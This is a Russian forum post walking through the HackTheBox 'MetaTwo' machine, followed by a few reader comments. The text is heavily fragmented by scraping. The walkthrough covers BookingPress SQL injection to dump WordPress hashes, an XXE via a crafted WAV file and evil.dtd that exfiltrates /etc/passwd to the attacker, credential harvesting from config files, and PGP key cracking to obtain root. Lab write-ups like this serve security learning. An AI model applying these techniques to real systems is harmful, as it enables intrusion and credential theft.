![]() |
Приветствую,
Код:
CodebyКод:
HackTheBoxКод:
MetaTwoРазведка Начинаем конечно же со сканирования портов. Используем флаг Код:
-sCКод:
-sVКод:
-sSКод:
TCP SYNКод:
nmapКод:
-oNКод:
nmap.outBash: Код:
sudoИтак, у нас есть 3 порта: Код:
21Код:
ftpКод:
22Код:
sshКод:
80Код:
httpКод:
22Код:
CTFКод:
80Код:
21Код:
FTP (File Transfer Protocol)Код:
anonymousПереходим на Код:
80Код:
http://10.10.11.86https://forum.antichat.xyz/attachmen...17bcfdeada.png Нам требуется добавить домен Код:
metapress.htbКод:
/etc/hostsКод:
nanoBash: Код:
sudohttps://forum.antichat.xyz/attachmen...df23ff35e4.png Теперь доступ к сайту нам открыт: https://forum.antichat.xyz/attachmen...e178fd8110.png По оформлению можно сразу сказать, что веб-сайт использует Код:
WordPressКод:
http://metapress.htb/events/Код:
WordPress'аhttps://forum.antichat.xyz/attachmen...a90fa28d03.png Открываем исходный код страницы, жмём Код:
CTRL+FКод:
wp-content/pluginhttps://forum.antichat.xyz/attachmen...a71ffa0177.png Как можно заметить - используется Код:
Booking PressКод:
1.0.10https://forum.antichat.xyz/attachmen...1b736b460c.png Сразу же вылетают ссылки с Код:
Unauthenticated SQL InjectionКод:
WordPress'аКод:
PoC (Proof Of Concept)https://forum.antichat.xyz/attachmen...c7bdb089ce.png Согласно описанию эксплойта нам также потребуется Код:
_wpnonceКод:
/events/Код:
CTRL+FКод:
action:'bookingpress_front_get_category_services'https://forum.antichat.xyz/attachmen...64e91a156b.png Теперь меняем в Код:
PoC'еКод:
_wpnonceBash: Код:
curlИсходя из этого можно сказать, что через 3 столбца мы можем выводить различную информацию с помощью Код:
SQL-инъекцииКод:
UNION-Based SQL-инъекцииКод:
group_concat()Код:
schemataКод:
information_schemaBash: Код:
curlОтлично, имеются две базы данных - Код:
information_schemaКод:
blogКод:
information_schemaТеперь нам нужно достать названия таблиц базы данных Код:
blogBash: Код:
curlНа этом этапе возникли некоторые проблемы - запрос не проходит. И основная её причина находится в Код:
where table_schema='blog'Открываем Код:
BurpSuiteКод:
DecoderКод:
blogКод:
ASCII hexhttps://forum.antichat.xyz/attachmen...1089f765a5.png Теперь вставляем данное значение в Код:
table_schema=0x626c6f67Код:
0xBash: Код:
curlМы получили все таблицы, которые расположены в базе данных Код:
blogКод:
wp-usersКод:
WordPressКод:
BurpSuiteКод:
wp_usershttps://forum.antichat.xyz/attachmen...1af05a9bf3.png В запросе указываем двойное условие, чтобы получить столбцы именно из таблицы Код:
wp_usersBash: Код:
curlИз этого всего нам требуется только Код:
user_loginКод:
user_passBash: Код:
curlПолучаем следующую строку: Код:
admin$P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV.,manager$P$B4aNM28N0E.tMy\/JIcnVMZbGcU16Q70Код:
\Код:
managerhttps://forum.antichat.xyz/attachmen...af982754e4.png Мы обладаем такими данными: Код: Код:
Имя пользователя: managerКод:
wp-login.phpКод:
WordPresshttps://forum.antichat.xyz/attachmen...6195c845ae.png Авторизация прошла успешно: https://forum.antichat.xyz/attachmen...e12db2ce6f.png Данный этап вызвал некоторые затруднения. Так как мы авторизовались, а вот что делать дальше - непонятно. Скорее всего нужно сканировать Код:
WordPressКод:
wpscanКод:
APIBash: Код:
wpscan --url http://metapress.htb --api-tokenКод:
XXEhttps://forum.antichat.xyz/attachmen...ddf07dfa63.png Делаем пэйлоад ( Код:
evil.dtdКод: Код:
Код:
PHPКод:
9898https://forum.antichat.xyz/attachmen...9c93de8f05.png Теперь генерируем вредоносный Код:
WAVBash: Код:
echoИ загружаем его сюда: https://forum.antichat.xyz/attachmen...c516db6d8d.png После загрузки видим, что Код:
10.10.11.186Код:
metapress.htbКод:
GETКод:
pКод:
/etc/passwdКод:
Base64https://forum.antichat.xyz/attachmen...2a7f156d0b.png Код: Код:
jVRNj5swEL3nV3BspUSGkGSDj22lXjaVuum9MuAFusamNiShv74zY8gmgu5WHtB8vHkezxisMS2/8BCWRZX5d1pplgpXLnIha6MBEcEaDNY5yxxAXjWmjTJFpRfovfA1LIrPg1zvABTDQo3l8jQL0hmgNny33cYbTiYbSRmai0LUEpm2fBdybxDPjXpHWQssbsejNUeVnYRlmchKycic4FUD8AdYoBDYNcYoppp8lrxSAN/DIpUSvDbBannGuhNYpN6Qe3uS0XUZFhOFKGTc5Hh7ktNYc+kxKUbx1j8mcj6fV7loBY4lRrk6aBuw5mYtspcOq4LxgAwmJXh97iCqcnjh4j3KAdpT6SJ4BGdwEFoU0noCgk2zK4t3Ik5QQIc52E4zr03AhRYttnkToXxFK/jUFasn2Rjb4r7H3rWyDj6IvK70x3HnlPnMmbmZ1OTYUn8n/XtwAkjLC5Qt9VzlP0XT0gDDIe29BEe15Sst27OxL5QLH2G45kMk+OYjQ+NqoFkul74jA+QNWiudUSdJtGt44ivtk4/Y/yCDz8zB1mnniAfuWZi8fzBX5gTfXDtBu6B7iv6lpXL+DxSGoX8NPiqwNLVkI+j1vzUes62gRv8nSZKEnvGcPyAEN0BnpTW6+iPaChneaFlmrMy7uiGuPT0j12cIBV8ghvd3rlG9+63oDFseRRE/9Mfvj8FR2rHPdy3DzGehnMRP+LltfLt2d+0aI9O9wE34hyve2RND7xT7Fw==Код:
PHPhttps://forum.antichat.xyz/attachmen...e3584cf3d2.png Подтвердили, что уязвимость работает. Теперь давайте посмотрим, что содержится в конфиге Код:
nginx'аКод:
nginxКод: Код:
https://forum.antichat.xyz/attachmen...e5c4835275.png Корневым каталогом веб-сервера является Код:
/var/www/metapress.htb/bloghttps://forum.antichat.xyz/attachmen...a8b5711414.png Исходя из этого мы можем прочитать конфигурационный файл Код:
WordPress'аКод:
wp-config.phpКод: Код:
https://forum.antichat.xyz/attachmen...3768a9d0ea.png В нём очень много данных: PHP: Код:
+3m?.B/:' );Код:
FTPКод: Код:
Имя: metapress.htbhttps://forum.antichat.xyz/attachmen...23878a87f4.png В Код:
FTPКод:
blogКод:
mailerКод:
mailerКод:
send_mail.phpКод:
mgethttps://forum.antichat.xyz/attachmen...baeaf3b141.png В нём содержатся данные для пользователя Код:
jnelsonPHP: Код:
SMTPDebug = 3; Код:
sshКод: Код:
Имя пользователя: jnelsonСразу же после подключения я обнаружил интересный скрытый каталог - Код:
.passpiehttps://forum.antichat.xyz/attachmen...56c14cc4ab.png Тут мы можем обнаружить сообщения, где поле password зашифровано с помощью Код:
PGPhttps://forum.antichat.xyz/attachmen...1773bfe39d.png А также публичные и приватные Код:
PGPhttps://forum.antichat.xyz/attachmen...44bc97fb5a.png Имея приватный Код:
PGPhttps://forum.antichat.xyz/attachmen...b3e321df5e.png Используем Код:
gpg2johnКод:
john the ripperКод:
rockyou.txtКод:
CTFКод:
14 341 564https://forum.antichat.xyz/attachmen...339447c617.png Пароль успешно сбрутился. Теперь открываем любой сайт по дешифровке Код:
PGPhttps://forum.antichat.xyz/attachmen...4f6880cc17.png Получаем пароль суперпользователя - Код:
p7qfAZt4_A1xo_0xКод:
root'аhttps://forum.antichat.xyz/attachmen...9f691b4c6f.png Друзья, большое спасибо, что дочитали до конца! Надеюсь, что Вы извлекли для себя что-то новое из этой статьи. Пишите в комментариях, если я допустил ошибки/неточности |
Прикона,разбор неплохой мне понравилось
Но хотелось бы побольше машин на windows |
Огромное спасибо за подробный разбор!
|
Благодарю, прекрасный разбор. Ыщё!
|
Спасибо за разбор! Я до сих пор не понимаю, как HTB выбирает уровень сложности, по мне так это не разу не easy
|
Цитата:
|
| Время: 08:21 |